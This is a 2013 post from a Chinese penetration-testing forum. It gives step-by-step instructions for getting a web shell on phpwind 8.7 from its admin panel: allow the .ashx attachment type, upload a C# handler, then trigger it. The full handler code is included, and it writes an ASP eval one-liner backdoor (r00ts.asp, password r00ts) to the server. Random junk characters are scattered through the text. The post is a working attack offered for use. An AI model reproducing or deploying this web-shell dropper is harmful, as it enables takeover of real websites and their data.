找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpwind 8.7 后台拿shell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1953|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小; Y" t5 |" A: x) B8 q
0 y$ h3 _7 r8 v) R' X: [% _6 `
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx# I; o( S! U. K% d5 ?4 H
3 y3 `4 g1 G- k
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
( m, F% u9 H" J0 B( [
( f  u6 B9 H6 U6 a/ O- D. H% N然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
0 G7 X) I( z& M & X9 a, P, v4 k, f! Q6 w3 A
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts; ^! i+ x! o) h+ D. a0 P2 q

# `  O8 Z2 l. h2 t' N$ E; W下面是代码:
/ g: L! x1 D% B( M9 n9 Z9 Q, z
& V* s  A8 y7 P+ f/ w5 G0 g* y( I<%@ WebHandler Language="C#"Class="Handler" %>
! n! V2 H$ p# `- X; o( P( Nusing System;
+ [9 V0 b9 U8 \- m! D& q4 U' s+ `: rusing System.Web;% P; u2 L* `/ h; c( d" G( C" M
using System.IO;
4 l% c, K6 v4 Rpublic class Handler : IHttpHandler {
' k' N1 U  ]: e& tpublic void ProcessRequest (HttpContext context) {
! u* z. d( m7 l4 r7 o" vcontext.Response.ContentType = "text/plain";
$ s$ {/ U; a5 O7 R4 {' a7 DStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));% Z. o! g0 j2 |8 f6 f" A" v2 G4 O
file1.Write("<%eval request(\"r00ts\")%>");5 \6 x2 j. d0 [4 x( K- p0 k$ `5 t
file1.Flush();; }. N  V, Z$ R' G$ k- T) e
file1.Close();
, {6 }' r4 _# B% ^" V}
! V7 j/ V9 Z# @/ B5 fpublic bool IsReusable {
2 P% z1 g3 s0 _; Zget {
# l* w) a/ W' _; d2 r8 Vreturn false;
* B9 p% b# m3 m; `" W}
" c. }% D8 _: j( M' K7 I# w}
8 M+ v- l4 |) ?+ u1 S- S}4 [* t, X: A) S, S3 g9 {1 l: W
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表